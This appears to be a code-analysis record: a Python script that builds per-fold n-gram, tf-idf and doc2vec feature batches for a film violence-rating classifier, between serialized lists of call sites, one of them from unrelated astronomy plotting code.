'(0.3)'}), '(left=0.1, right=0.95, top=0.95, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (11793, 11865), True, 'import pylab as pl\n'), 
((11952, 11971), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (11962, 11971), True, 'import pylab as pl\n'), ((12073, 12086), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (12084, 12086), True, 'import pylab as pl\n'), ((12112, 12162), 'pylab.title', 'pl.title', (['"""Time constants (ms)"""'], {'fontsize': 'title_fs'}), "('Time constants (ms)', fontsize=title_fs)\n", (12120, 12162), True, 'import pylab as pl\n'), ((12198, 12217), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (12208, 12217), True, 'import pylab as pl\n'), ((12323, 12336), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (12334, 12336), True, 'import pylab as pl\n'), ((12362, 12418), 'pylab.title', 'pl.title', (['"""Time constant errors (ms)"""'], {'fontsize': 'title_fs'}), "('Time constant errors (ms)', fontsize=title_fs)\n", (12370, 12418), True, 'import pylab as pl\n'), ((12855, 12894), 'pylab.savefig', 'pl.savefig', (["(filename + 'time_const.png')"], {}), "(filename + 'time_const.png')\n", (12865, 12894), True, 'import pylab as pl\n'), ((12901, 12909), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (12907, 12909), True, 'import pylab as pl\n'), ((13370, 13389), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (13380, 13389), True, 'import pylab as pl\n'), ((13470, 13483), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (13481, 13483), True, 'import pylab as pl\n'), ((13518, 13554), 'pylab.title', 'pl.title', (['"""N_obs"""'], {'fontsize': 'title_fs'}), "('N_obs', fontsize=title_fs)\n", (13526, 13554), True, 'import pylab as pl\n'), ((13564, 13602), 'pylab.savefig', 'pl.savefig', (["(filename + 'positions.png')"], {}), "(filename + 'positions.png')\n", (13574, 13602), True, 'import pylab as pl\n'), ((13609, 13617), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (13615, 13617), True, 'import pylab as pl\n'), ((13669, 13680), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (13678, 13680), True, 'import pylab as 
pl\n'), ((15252, 15309), 'moby2.util.StructDB.from_column_file', 'moby2.util.StructDB.from_column_file', (['filename', 'load_args'], {}), '(filename, load_args)\n', (15288, 15309), False, 'import moby2\n'), ((22738, 22749), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (22747, 22749), True, 'import pylab as pl\n'), ((22794, 22884), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.1)', 'right': '(0.98)', 'top': '(0.85)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': '(0.3)'}), '(left=0.1, right=0.98, top=0.85, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (22812, 22884), True, 'import pylab as pl\n'), ((22910, 22925), 'pylab.subplot', 'pl.subplot', (['(121)'], {}), '(121)\n', (22920, 22925), True, 'import pylab as pl\n'), ((22999, 23049), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""o"""', 's': '(4)', 'alpha': '(0.5)'}), "(x[s], y[s], marker='o', s=4, alpha=0.5)\n", (23009, 23049), True, 'import pylab as pl\n'), ((23057, 23071), 'pylab.xlabel', 'pl.xlabel', (['"""X"""'], {}), "('X')\n", (23066, 23071), True, 'import pylab as pl\n'), ((23080, 23094), 'pylab.ylabel', 'pl.ylabel', (['"""Y"""'], {}), "('Y')\n", (23089, 23094), True, 'import pylab as pl\n'), ((23103, 23129), 'pylab.title', 'pl.title', (['"""Input template"""'], {}), "('Input template')\n", (23111, 23129), True, 'import pylab as pl\n'), ((23189, 23204), 'pylab.subplot', 'pl.subplot', (['(122)'], {}), '(122)\n', (23199, 23204), True, 'import pylab as pl\n'), ((23278, 23311), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (23288, 23311), True, 'import pylab as pl\n'), ((23401, 23435), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (23411, 23435), True, 'import pylab as pl\n'), ((23720, 23740), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (23729, 23740), True, 'import pylab as pl\n'), ((23749, 23769), 'pylab.ylabel', 'pl.ylabel', (['"""Y 
(deg)"""'], {}), "('Y (deg)')\n", (23758, 23769), True, 'import pylab as pl\n'), ((23778, 23803), 'pylab.title', 'pl.title', (['"""Fitted result"""'], {}), "('Fitted result')\n", (23786, 23803), True, 'import pylab as pl\n'), ((23927, 23962), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + 'fit.png')"], {}), "(plot_prefix + 'fit.png')\n", (23937, 23962), True, 'import pylab as pl\n'), ((23971, 23982), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (23980, 23982), True, 'import pylab as pl\n'), ((24227, 24238), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (24236, 24238), True, 'import pylab as pl\n'), ((24288, 24378), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.15)', 'right': '(0.95)', 'top': '(0.9)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': '(0.3)'}), '(left=0.15, right=0.95, top=0.9, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (24306, 24378), True, 'import pylab as pl\n'), ((24470, 24504), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (24480, 24504), True, 'import pylab as pl\n'), ((24513, 24554), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '0template.png')"], {}), "(plot_prefix + '0template.png')\n", (24523, 24554), True, 'import pylab as pl\n'), ((24563, 24571), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (24569, 24571), True, 'import pylab as pl\n'), ((24646, 24679), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (24656, 24679), True, 'import pylab as pl\n'), ((24687, 24707), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (24696, 24707), True, 'import pylab as pl\n'), ((24716, 24736), 'pylab.ylabel', 'pl.ylabel', (['"""Y (deg)"""'], {}), "('Y (deg)')\n", (24725, 24736), True, 'import pylab as pl\n'), ((24745, 24783), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '1model.png')"], {}), "(plot_prefix + '1model.png')\n", (24755, 24783), True, 'import pylab as pl\n'), ((24792, 24800), 'pylab.clf', 
'pl.clf', ([], {}), '()\n', (24798, 24800), True, 'import pylab as pl\n'), ((24905, 24938), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (24915, 24938), True, 'import pylab as pl\n'), ((25028, 25062), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (25038, 25062), True, 'import pylab as pl\n'), ((25347, 25367), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (25356, 25367), True, 'import pylab as pl\n'), ((25376, 25396), 'pylab.ylabel', 'pl.ylabel', (['"""Y (deg)"""'], {}), "('Y (deg)')\n", (25385, 25396), True, 'import pylab as pl\n'), ((25463, 25499), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '2fit.png')"], {}), "(plot_prefix + '2fit.png')\n", (25473, 25499), True, 'import pylab as pl\n'), ((25508, 25519), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (25517, 25519), True, 'import pylab as pl\n'), ((1340, 1372), 'numpy.array', 'np.array', (['det_uid'], {'dtype': '"""int64"""'}), "(det_uid, dtype='int64')\n", (1348, 1372), True, 'import numpy as np\n'), ((6684, 6704), 'numpy.arange', 'np.arange', (['n_det_uid'], {}), '(n_det_uid)\n', (6693, 6704), True, 'import numpy as np\n'), ((8769, 8780), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (8778, 8780), True, 'import pylab as pl\n'), ((8852, 8873), 'pylab.figure', 'pl.figure', (['fig.number'], {}), '(fig.number)\n', (8861, 8873), True, 'import pylab as pl\n'), ((8932, 8967), 'pylab.title', 'pl.title', (["(title + ' - no good fits')"], {}), "(title + ' - no good fits')\n", (8940, 8967), True, 'import pylab as pl\n'), ((8980, 9000), 'pylab.savefig', 'pl.savefig', (['filename'], {}), '(filename)\n', (8990, 9000), True, 'import pylab as pl\n'), ((9013, 9021), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (9019, 9021), True, 'import pylab as pl\n'), ((9209, 9221), 'numpy.median', 'np.median', (['x'], {}), '(x)\n', (9218, 9221), True, 'import numpy as np\n'), ((9223, 9235), 
'numpy.median', 'np.median', (['y'], {}), '(y)\n', (9232, 9235), True, 'import numpy as np\n'), ((9293, 9305), 'numpy.median', 'np.median', (['r'], {}), '(r)\n', (9302, 9305), True, 'import numpy as np\n'), ((9454, 9468), 'numpy.any', 'np.any', (['inside'], {}), '(inside)\n', (9460, 9468), True, 'import numpy as np\n'), ((10365, 10402), 'pylab.MultipleLocator', 'pl.MultipleLocator', (['(10 ** log_spacing)'], {}), '(10 ** log_spacing)\n', (10383, 10402), True, 'import pylab as pl\n'), ((10810, 10874), 'pylab.scatter', 'pl.scatter', (['cols[bads]', 'rows[bads]'], {'marker': '"""x"""', 'edgecolor': '"""gray"""'}), "(cols[bads], rows[bads], marker='x', edgecolor='gray')\n", (10820, 10874), True, 'import pylab as pl\n'), ((11217, 11250), 'numpy.zeros', 'np.zeros', (['(n_rows, n_cols)', 'dtype'], {}), '((n_rows, n_cols), dtype)\n', (11225, 11250), True, 'import numpy as np\n'), ((11400, 11419), 'pylab.xlabel', 'pl.xlabel', (['"""Column"""'], {}), "('Column')\n", (11409, 11419), True, 'import pylab as pl\n'), ((11432, 11448), 'pylab.ylabel', 'pl.ylabel', (['"""Row"""'], {}), "('Row')\n", (11441, 11448), True, 'import pylab as pl\n'), ((11461, 11488), 'pylab.xlim', 'pl.xlim', (['(-0.5)', '(n_cols - 0.5)'], {}), '(-0.5, n_cols - 0.5)\n', (11468, 11488), True, 'import pylab as pl\n'), ((11499, 11526), 'pylab.ylim', 'pl.ylim', (['(-0.5)', '(n_rows - 0.5)'], {}), '(-0.5, n_rows - 0.5)\n', (11506, 11526), True, 'import pylab as pl\n'), ((12489, 12508), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (12499, 12508), True, 'import pylab as pl\n'), ((12519, 12563), 'pylab.hist', 'pl.hist', (['(self.tau[self.ok] * 1000.0)'], {'bins': '(20)'}), '(self.tau[self.ok] * 1000.0, bins=20)\n', (12526, 12563), True, 'import pylab as pl\n'), ((12598, 12629), 'pylab.xlabel', 'pl.xlabel', (['"""Time constant (ms)"""'], {}), "('Time constant (ms)')\n", (12607, 12629), True, 'import pylab as pl\n'), ((12642, 12661), 'pylab.ylabel', 'pl.ylabel', (['"""N_dets"""'], {}), 
"('N_dets')\n", (12651, 12661), True, 'import pylab as pl\n'), ((12674, 12693), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (12684, 12693), True, 'import pylab as pl\n'), ((12775, 12813), 'pylab.xlabel', 'pl.xlabel', (['"""Time constant errors (ms)"""'], {}), "('Time constant errors (ms)')\n", (12784, 12813), True, 'import pylab as pl\n'), ((12826, 12845), 'pylab.ylabel', 'pl.ylabel', (['"""N_dets"""'], {}), "('N_dets')\n", (12835, 12845), True, 'import pylab as pl\n'), ((12988, 13011), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(1 + i)'], {}), '(2, 2, 1 + i)\n', (12998, 13011), True, 'import pylab as pl\n'), ((13194, 13207), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (13205, 13207), True, 'import pylab as pl\n'), ((13271, 13343), 'pylab.title', 'pl.title', (["('%s position RMS' % {(0): 'X', (1): 'Y'}[i])"], {'fontsize': 'title_fs'}), "('%s position RMS' % {(0): 'X', (1): 'Y'}[i], fontsize=title_fs)\n", (13279, 13343), True, 'import pylab as pl\n'), ((14570, 14624), 'moby2.scripting.products.get_tod_id', 'moby2.scripting.products.get_tod_id', ([], {'tod_info': 'tod_info'}), '(tod_info=tod_info)\n', (14605, 14624), False, 'import moby2\n'), ((14642, 14680), 'moby2.scripting.execcfg.InputChooser', 'moby2.scripting.execcfg.InputChooser', ([], {}), '()\n', (14678, 14680), False, 'import moby2\n'), ((14907, 14947), 'moby2.scripting.get_depot', 'moby2.scripting.get_depot', (["opts['depot']"], {}), "(opts['depot'])\n", (14932, 14947), False, 'import moby2\n'), ((15488, 15522), 'numpy.ones', 'np.ones', (["pos_data['x'].shape", 'bool'], {}), "(pos_data['x'].shape, bool)\n", (15495, 15522), True, 'import numpy as np\n'), ((16080, 16093), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (16086, 16093), True, 'import numpy as np\n'), ((16095, 16108), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (16101, 16108), True, 'import numpy as np\n'), ((16425, 16438), 'numpy.exp', 'np.exp', (['scale'], {}), '(scale)\n', (16431, 
16438), True, 'import numpy as np\n'), ((16440, 16456), 'numpy.exp', 'np.exp', (['sh_scale'], {}), '(sh_scale)\n', (16446, 16456), True, 'import numpy as np\n'), ((17243, 17256), 'numpy.exp', 'np.exp', (['scale'], {}), '(scale)\n', (17249, 17256), True, 'import numpy as np\n'), ((17258, 17274), 'numpy.exp', 'np.exp', (['sh_scale'], {}), '(sh_scale)\n', (17264, 17274), True, 'import numpy as np\n'), ((19773, 19787), 'numpy.median', 'np.median', (['var'], {}), '(var)\n', (19782, 19787), True, 'import numpy as np\n'), ((23645, 23716), 'pylab.plot', 'pl.plot', (['[x1[i] * DEG, x[i]]', '[y1[i] * DEG, y[i]]'], {'color': '"""k"""', 'alpha': '(0.4)'}), "([x1[i] * DEG, x[i]], [y1[i] * DEG, y[i]], color='k', alpha=0.4)\n", (23652, 23716), True, 'import pylab as pl\n'), ((23863, 23917), 'pylab.figtext', 'pl.figtext', (['(0.5)', '(0.93)', 'title'], {'va': '"""bottom"""', 'ha': '"""center"""'}), "(0.5, 0.93, title, va='bottom', ha='center')\n", (23873, 23917), True, 'import pylab as pl\n'), ((25272, 25343), 'pylab.plot', 'pl.plot', (['[x1[i] * DEG, x[i]]', '[y1[i] * DEG, y[i]]'], {'color': '"""k"""', 'alpha': '(0.4)'}), "([x1[i] * DEG, x[i]], [y1[i] * DEG, y[i]], color='k', alpha=0.4)\n", (25279, 25343), True, 'import pylab as pl\n'), ((25439, 25454), 'pylab.title', 'pl.title', (['title'], {}), '(title)\n', (25447, 25454), True, 'import pylab as pl\n'), ((26281, 26345), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['col_defs'], {'formats': 'fits[0].formats'}), '(col_defs, formats=fits[0].formats)\n', (26310, 26345), False, 'import moby2\n'), ((7539, 7551), 'numpy.median', 'np.median', (['x'], {}), '(x)\n', (7548, 7551), True, 'import numpy as np\n'), ((7553, 7565), 'numpy.median', 'np.median', (['y'], {}), '(y)\n', (7562, 7565), True, 'import numpy as np\n'), ((9781, 9796), 'pylab.xlim', 'pl.xlim', (['*xlims'], {}), '(*xlims)\n', (9788, 9796), True, 'import pylab as pl\n'), ((9798, 9813), 'pylab.ylim', 'pl.ylim', (['*ylims'], {}), '(*ylims)\n', (9805, 
9813), True, 'import pylab as pl\n'), ((10461, 10469), 'pylab.gca', 'pl.gca', ([], {}), '()\n', (10467, 10469), True, 'import pylab as pl\n'), ((10501, 10509), 'pylab.gca', 'pl.gca', ([], {}), '()\n', (10507, 10509), True, 'import pylab as pl\n'), ((11734, 11742), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (11740, 11742), True, 'import pylab as pl\n'), ((22561, 22578), 'pylab.MaxNLocator', 'pl.MaxNLocator', (['(4)'], {}), '(4)\n', (22575, 22578), True, 'import pylab as pl\n'), ((22626, 22643), 'pylab.MaxNLocator', 'pl.MaxNLocator', (['(5)'], {}), '(5)\n', (22640, 22643), True, 'import pylab as pl\n'), ((24247, 24255), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (24253, 24255), True, 'import pylab as pl\n'), ((8793, 8801), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (8799, 8801), True, 'import pylab as pl\n'), ((20533, 20554), 'numpy.array', 'np.array', (['free_params'], {}), '(free_params)\n', (20541, 20554), True, 'import numpy as np\n'), ((20632, 20728), 'moby2.util.fitting.multi_fmin', 'moby2.util.fitting.multi_fmin', (['fit_chi2', 'params1'], {'free': 'free', 'disp': '(0)', 'xtol': '(1e-06)', 'ftol': '(1e-06)'}), '(fit_chi2, params1, free=free, disp=0, xtol=\n 1e-06, ftol=1e-06)\n', (20661, 20728), False, 'import moby2\n'), ((7211, 7223), 'numpy.isnan', 'np.isnan', (['_x'], {}), '(_x)\n', (7219, 7223), True, 'import numpy as np\n'), ((7227, 7239), 'numpy.isinf', 'np.isinf', (['_x'], {}), '(_x)\n', (7235, 7239), True, 'import numpy as np\n'), ((10298, 10309), 'numpy.log10', 'np.log10', (['b'], {}), '(b)\n', (10306, 10309), True, 'import numpy as np\n'), ((10265, 10280), 'numpy.log10', 'np.log10', (['delta'], {}), '(delta)\n', (10273, 10280), True, 'import numpy as np\n'), ((10283, 10294), 'numpy.log10', 'np.log10', (['b'], {}), '(b)\n', (10291, 10294), True, 'import numpy as np\n')] |
# Fix RNG seeds *before* any Keras/TensorFlow usage so runs are reproducible.
from numpy.random import seed
seed(5393)
from tensorflow import set_random_seed
set_random_seed(12011)
import os
import numpy as np
import pandas as pd
from scipy import sparse
from sklearn.preprocessing import LabelEncoder, LabelBinarizer
from sklearn.pipeline import FeatureUnion
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.model_selection import train_test_split, StratifiedKFold
from joblib import Parallel, delayed
from tqdm import tqdm
import logging
logging.basicConfig(level = logging.INFO)
# Configuration constants.
# NOTE(review): EMBED_DIM is never referenced in this file — presumably the
# embedding dimensionality used elsewhere; confirm before removing.
EMBED_DIM = 300
VOCAB_SIZE = 5000   # max vocabulary size per n-gram vectorizer
max_len = 1000      # target number of rows (sentences) per document tensor
batch_size = 16     # documents per saved batch file
n_folds = 5         # cross-validation folds
# Output root for the per-fold batch files and the input dataframe pickle.
fold_dir = "/data/victor/violence-workshop/batches/reversefolds"
data_pkl = "../../data/dataframe_with_scores_withdoc2vec.pkl"
def pad_csr(a, newshape):
    """Zero-pad a csr_matrix in place so that it has shape ``newshape``.

    Only extra (empty) rows are appended: ``indptr`` is extended by
    repeating its last value, which marks every new row as holding no
    stored elements.  Mutates ``a`` directly and returns nothing.
    """
    old_rows, _ = a.shape
    extra_rows = newshape[0] - old_rows
    a._shape = newshape
    a.indptr = np.pad(a.indptr, (0, extra_rows), 'edge')
def filter_nans(seq):
    """Drop every plain ``float`` entry (typically np.nan) from *seq*.

    Returns the surviving items wrapped in a numpy array.
    """
    kept = [item for item in seq if not isinstance(item, float)]
    return np.array(kept)
def pad_or_trim(seq, max_len=1000):
    """Force *seq* (2-D array or sparse matrix) to exactly ``max_len`` rows.

    Longer inputs keep only their **last** ``max_len`` rows; shorter inputs
    are zero-padded at the bottom — in place for sparse matrices (via
    ``pad_csr``), by copy for dense arrays.
    """
    n_rows, n_cols = seq.shape
    if n_rows > max_len:
        return seq[-max_len:, :]
    if n_rows < max_len:
        if sparse.issparse(seq):
            pad_csr(seq, (max_len, n_cols))
        else:
            filler = np.zeros((max_len - n_rows, n_cols))
            seq = np.r_[seq, filler]
    return seq
def process_ngrams(batch_features, ngram_features):
    """Vectorize a batch of documents into a dense 3-D tensor.

    Each entry of *batch_features* (a pandas Series of documents) is run
    through ``ngram_features.transform`` and padded/trimmed to ``max_len``
    rows, then everything is stacked into an array of shape
    ``(len(batch_features), max_len, n_features)``.
    """
    batch_len = batch_features.shape[0]
    transformed = batch_features.apply(ngram_features.transform)\
                                .apply(pad_or_trim)
    stacked = sparse.vstack(transformed)
    return stacked.toarray().reshape(batch_len, max_len, -1)
def process_scores(X):
    """Turn a Series of per-sentence score lists into a 3-D tensor.

    A special case of :func:`process_ngrams` for scalar score sequences:
    each list becomes a single-column vector padded/trimmed to ``max_len``
    rows, giving an output of shape ``(len(X), max_len, 1)``.
    """
    columns = X.apply(np.array)\
               .apply(lambda s: s.reshape(-1, 1))\
               .apply(pad_or_trim)
    stacked = np.concatenate(columns.values, axis = 0)
    return stacked.reshape(-1, max_len, 1)
############################################################
# Load Data
############################################################
data = pd.read_pickle(data_pkl)

# Encode genre
# NOTE(review): the 'genre' column is overwritten in place with integer
# codes; lb_genre keeps the label <-> code mapping if it is needed later.
lb_genre = LabelEncoder()
data['genre'] = lb_genre.fit_transform(data['genre'])

############################################################
# 3 to 5 chars w/ spaces
# unigrams + bigrams
############################################################
# This defines the analyzer to be used with Countvectorizer
def char_ngram_tokenizer(text, ngram_range):
    """Yield every character n-gram of *text*.

    ``n`` runs over ``range(*ngram_range)``, i.e. the upper bound is
    exclusive, so ``ngram_range=(3, 6)`` produces 3-, 4- and 5-character
    grams.
    """
    def aux(text, ngram_size):
        # +1 so the n-gram ending at the last character is included.
        # The original ``range(len(text) - ngram_size)`` silently dropped
        # the final gram (and yielded nothing at all when
        # len(text) == ngram_size).
        for i in range(len(text) - ngram_size + 1):
            yield text[i : i + ngram_size]
    for n in range(*ngram_range):
        yield from aux(text, n)
# Combined character-level and token-level count features.
# NOTE(review): the lambda analyzer makes this FeatureUnion unpicklable
# with the stdlib pickle — confirm nothing tries to serialize it.
ngram_features = FeatureUnion([
    ("char_ngrams", CountVectorizer(analyzer = lambda text: char_ngram_tokenizer(text, ngram_range=(3, 6)),
                                    max_features = VOCAB_SIZE)),
    ("token_ngrams", CountVectorizer(ngram_range=(1, 2),
                                     max_features=VOCAB_SIZE))
])
# Separate tf-idf weighted uni/bigram features.
tfidf_ = TfidfVectorizer(ngram_range=(1, 2), max_features=VOCAB_SIZE)
############################################################
# Batch generation
############################################################
def process(X, Y, i, ngram_features, batch_dir, tfidf_transformer = None):
    """Write feature batch files for the slice ``X[i : i + batch_size]``.

    Only the doc2vec features are currently written (one compressed
    ``<i>_doc2vec.npz`` per batch in *batch_dir*); the other feature
    families below are kept as commented-out history.  ``Y``,
    ``ngram_features`` and ``tfidf_transformer`` are unused on the active
    path but kept for interface compatibility with the disabled code.
    Returns nothing.
    """
    # Features
    ## ngrams
    #logging.info("ngrams")
    #batch_ngrams = process_ngrams(X['sentences'].iloc[i : i + batch_size], ngram_features)
    #np.savez(os.path.join(batch_dir, "{}_ngrams".format(i)),
    #         features = batch_ngrams)
    #batch_ngrams = None
    ## tfidf
    #logging.info("tfidf")
    #batch_tfidf = process_ngrams(X['sentences'].iloc[i : i + batch_size], tfidf_transformer)
    #np.savez(os.path.join(batch_dir, "{}_tfidf".format(i)),
    #         features = batch_tfidf)
    #batch_tfidf = None
    # ## Word2vec
    #logging.info("word2vec")
    #batch_word2vec = X['word2vec_sent_mean_vec'].iloc[i : i + batch_size]\
    #                 .apply(filter_nans)\
    #                 .apply(pad_or_trim)
    #np.savez(os.path.join(batch_dir, "{}_word2vec".format(i)),
    #         features = batch_word2vec)
    #batch_word2vec = None
    # paragraph2vec
    logging.info("paragraph2vec")
    # Drop nan placeholders, then force every document to max_len rows.
    batch_paragraph2vec = X['doc2vec_vectors'].iloc[i : i + batch_size]\
                          .apply(filter_nans)\
                          .apply(pad_or_trim)
    np.savez(os.path.join(batch_dir, "{}_doc2vec".format(i)),
             features = batch_paragraph2vec)
    # Release the batch before returning (mirrors the disabled branches).
    batch_paragraph2vec = None
    # ## Lexicons
    #logging.info("Empath")
    #batch_empath = X['empath_sentence'].iloc[i : i + batch_size]\
    #               .apply(np.array)\
    #               .apply(pad_or_trim)
    #np.savez(os.path.join(batch_dir, "{}_empath".format(i)),
    #         empath = batch_empath)
    #logging.info("Lexicons")
    #batch_lexicon = process_scores(X['abusive_scores'].iloc[i : i + batch_size])
    #batch_vader = process_scores(X['vader_scores'].iloc[i : i + batch_size])
    #batch_afinn = process_scores(X['afinn_scores'].iloc[i : i + batch_size])
    #batch_hatebase = X['hatebase_sentence'].iloc[i : i + batch_size].apply(pad_or_trim)
    #np.savez(os.path.join(batch_dir, "{}_lexicon".format(i)),
    #         abusive_scores = batch_lexicon,
    #         vader = batch_vader,
    #         afinn = batch_afinn,
    #         hatebase = batch_hatebase)
    # batch_lexicon = None
    #batch_vader = None
    #batch_afinn = None
    #batch_hatebase = None
    ## Save labels
    #logging.info("Labels")
    #batch_labels = Y[i : i + batch_size]
    #np.savez(os.path.join(batch_dir, "{}_labels".format(i)),
    #         labels = batch_labels)
    ## Save metadata
    #logging.info("Metadata")
    #batch_genre = X['genre'][i : i + batch_size]
    #np.savez(os.path.join(batch_dir, "{}_meta".format(i)),
    #         genre = batch_genre)
    logging.info("Done for {}".format(i))
# Build per-fold train/eval/test batch directories.
# NOTE(review): random_state on StratifiedKFold has no effect (and raises
# in newer scikit-learn) unless shuffle=True is also passed — confirm the
# intended behavior.
skf = StratifiedKFold(n_splits = n_folds, random_state = 42)
lb = LabelBinarizer()
Y = lb.fit_transform(data['violence_rating'])

for k, (train, test) in enumerate(skf.split(data.violence_rating, data.violence_rating)):
    train_dir = os.path.join(fold_dir, str(k), "train")
    test_dir = os.path.join(fold_dir, str(k), "test")
    eval_dir = os.path.join(fold_dir, str(k), "eval")
    for t in [train_dir, test_dir, eval_dir]:
        os.makedirs(t, exist_ok = True)
    X_train, X_test = data.iloc[train], data.iloc[test]
    Y_train, Y_test = Y[train], Y[test]
    # Carve a fixed-size eval split (64 docs) out of the training fold.
    X_train, X_eval, Y_train, Y_eval = train_test_split(X_train, Y_train, test_size = 64, random_state = 666)
    # Fit vocab
    # Vocabularies are fitted on the full training fold only (no leakage
    # from the test fold).
    ngram_features.fit(data.iloc[train]['text'], Y_train)
    tfidf_.fit(data.iloc[train]['text'], Y_train)
    # Create batches
    for i in tqdm(range(0, X_train.shape[0], batch_size)):
        process(X_train, Y_train, i, ngram_features = ngram_features, batch_dir = train_dir, tfidf_transformer = tfidf_)
    for i in tqdm(range(0, X_eval.shape[0], batch_size)):
        process(X_eval, Y_eval, i, ngram_features = ngram_features, batch_dir = eval_dir, tfidf_transformer = tfidf_)
    for i in tqdm(range(0, X_test.shape[0], batch_size)):
        process(X_test, Y_test, i, ngram_features = ngram_features, batch_dir = test_dir, tfidf_transformer = tfidf_)
| [
"logging.basicConfig",
"pandas.read_pickle",
"sklearn.preprocessing.LabelEncoder",
"sklearn.preprocessing.LabelBinarizer",
"scipy.sparse.vstack",
"os.makedirs",
"sklearn.model_selection.train_test_split",
"sklearn.feature_extraction.text.CountVectorizer",
"scipy.sparse.issparse",
"sklearn.model_se... | [((30, 40), 'numpy.random.seed', 'seed', (['(5393)'], {}), '(5393)\n', (34, 40), False, 'from numpy.random import seed\n'), ((80, 102), 'tensorflow.set_random_seed', 'set_random_seed', (['(12011)'], {}), '(12011)\n', (95, 102), False, 'from tensorflow import set_random_seed\n'), ((509, 548), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (528, 548), False, 'import logging\n'), ((2543, 2567), 'pandas.read_pickle', 'pd.read_pickle', (['data_pkl'], {}), '(data_pkl)\n', (2557, 2567), True, 'import pandas as pd\n'), ((2595, 2609), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (2607, 2609), False, 'from sklearn.preprocessing import LabelEncoder, LabelBinarizer\n'), ((3525, 3585), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {'ngram_range': '(1, 2)', 'max_features': 'VOCAB_SIZE'}), '(ngram_range=(1, 2), max_features=VOCAB_SIZE)\n', (3540, 3585), False, 'from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n'), ((6470, 6520), 'sklearn.model_selection.StratifiedKFold', 'StratifiedKFold', ([], {'n_splits': 'n_folds', 'random_state': '(42)'}), '(n_splits=n_folds, random_state=42)\n', (6485, 6520), False, 'from sklearn.model_selection import train_test_split, StratifiedKFold\n'), ((6530, 6546), 'sklearn.preprocessing.LabelBinarizer', 'LabelBinarizer', ([], {}), '()\n', (6544, 6546), False, 'from sklearn.preprocessing import LabelEncoder, LabelBinarizer\n'), ((901, 947), 'numpy.pad', 'np.pad', (['a.indptr', '(0, newshape[0] - n)', '"""edge"""'], {}), "(a.indptr, (0, newshape[0] - n), 'edge')\n", (907, 947), True, 'import numpy as np\n'), ((1781, 1810), 'scipy.sparse.vstack', 'sparse.vstack', (['batch_features'], {}), '(batch_features)\n', (1794, 1810), False, 'from scipy import sparse\n'), ((4746, 4775), 'logging.info', 'logging.info', (['"""paragraph2vec"""'], {}), "('paragraph2vec')\n", (4758, 4775), False, 'import 
